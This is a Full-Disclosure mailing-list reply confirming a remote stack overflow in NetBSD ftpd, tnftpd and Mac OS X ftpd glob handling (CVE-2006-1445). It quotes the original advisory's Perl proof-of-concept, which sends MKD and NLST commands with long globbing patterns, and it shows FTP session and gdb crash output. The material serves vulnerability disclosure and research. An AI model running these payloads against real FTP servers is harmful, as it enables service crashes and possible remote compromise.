Re: NetBSD FTPD and ports ***REMOTE ROOOOOT HOLE***

["K F (lists)" <kf_lists () digitalmunition com>]

I can confirm that this bug is present on OSX 10.3.9 at the very least. 
lukemftpd-20040810 is the version this was tested against.
I am fairly sure that this issue was patched recently in:

Security Update 2006-003

    *

      *FTPServer*

      CVE-ID: CVE-2006-1445

      Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
      v10.4.6, Mac OS X Server v10.4.6

      Impact: FTP operations by authenticated FTP users may lead to
      arbitrary code execution

      Description: Multiple issues in FTP server path name handling
      could result in a buffer overflow. A malicious authenticated user
      may be able to trigger this overflow which may lead to arbitrary
      code execution with the privileges of the FTP server. This update
      adresses the issue by properly handling the boundary conditions.

ftp> o localhost
Trying ::1...
Connected to localhost.
220 localhost FTP server (tnftpd 20040810) ready.
Name (localhost:kevinf):
331 Password required for kevinf.
Password:
230-
    Welcome to Darwin!
230 User kevinf logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mkdir 
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                                                                                              
550 
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC:
 
File exists.
ftp> ls 
C*/../C*/../C*/../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
229 Entering Extended Passive Mode (|||49225|)

421 Service not available, remote server timed out. Connection closed
ftp>

kevin-fs-Computer:/cores kevinf$ sudo gdb -q /usr/libexec/ftpd 425
Password:
Reading symbols for shared libraries ... done
/cores/425: No such file or directory.
Attaching to program: `/usr/libexec/ftpd', process 425.
Reading symbols for shared libraries ........... done
0x9000ed44 in read ()
(gdb) c
Continuing.

Program received signal EXC_BAD_ACCESS, Could not access memory.
0x00410040 in ?? ()
(gdb) bt
#0  0x00410040 in ?? ()
Cannot access memory at address 0x410040
Cannot access memory at address 0x410041
#1  0x00000000 in ?? ()
(gdb)

kevin-fs-Computer:/Volumes/HARD DISK kevinf$ ps -aux 
-ocommand,svuid,svgid,ruid,rgid,uid,gid | grep ftpd
kevinf     425   0.0  0.3    28072    820  ??  SXs   8:02PM   
0:00.05     0     0     0     0   501   501 ftpd -l

This could be fun on x86 machines.... good luck on powerpc howerver.

Thanks for the excuse to finish my OSX Unicode research!


-KF


kcope wrote:
> LAMERZ!!!!!
> KEEP ON HACKING!!! KEEP THAT *FUCK*ING PRIVATE!!!
>
> Greetings to the elite guys, thank you for your time.
>
> signed,
> ***eliteboy***
>
> $$$ NetBSD ftpd and ports *Remote ROOOOOT $HOLE$* $$$
>
> About
>
> tnftpd is a port of the NetBSD FTP server to other systems.
> It offers many enhancements over the traditional BSD ftpd,
> including per-class configuration directives via ftpd.conf(5),
> RFC 2389 and draft-ietf-ftpext-mlst-11 support, IPv6,
> transfer rate throttling, and more.
> tnftpd was formerly known as lukemftpd,
> and earlier versions are present in Mac OS X 10.2 (as ftpd)
> and FreeBSD 5.0 (as lukemftpd). 
>
> Description
>
> The NetBSD ftpd and the tnftpd port suffer from a remote stack overrun,
> which can lead to a root compromise.
>
> The bug is in glob.c file. The globbing mechanism is flawed as back in
> 2001.
>
> To trigger the overflow you can create a folder and use the globbing
> special characters (like STARS) to overflow an internal stack based buffer.
> Example PoC:
> ---snip---
> use IO::Socket;
>
> $sock = IO::Socket::INET->new(PeerAddr => '192.168.2.10',
>                               PeerPort => '21',
>                               Proto    => 'tcp');
> $c = "C";
> $a = "C" x 255;
> $d = "A" x 450;
>
> print $sock "USER kcope\r\n";
> print $sock "PASS remoteroot\r\n";
> $x = <stdin>;
> print $sock "MKD $a\r\n";
> print $sock "NLST C*/../C*/../C*/../$d\r\n";
> print $sock "QUIT\r\n";
>
> while (<$sock>) {
>       print;  
> }
> ---snip---
>
> gdb output tested on NetBSD 3.0 i386 NetBSD-ftpd 20050303 :
> (gdb) c
> Continuing.
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x00410041 in ?? ()
> (gdb)
>
>
>
>
> tnftpd-20040810 behaves similar.
> FreeBSD (lukemftpd) and MacOSX (ftpd) were not tested,
> however they could have the same bug, because of the same
> codebase.
>
> The problem when exploiting this kind of bug is,
> that we can only control 0x00410041, not the whole
> 32 bit. However it looks feasible to find a way
> to do a hole EIP redirection and/or exploit
> the bug the "unicode" way, which could be especially
> hard on BSD systems.
>
>   

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/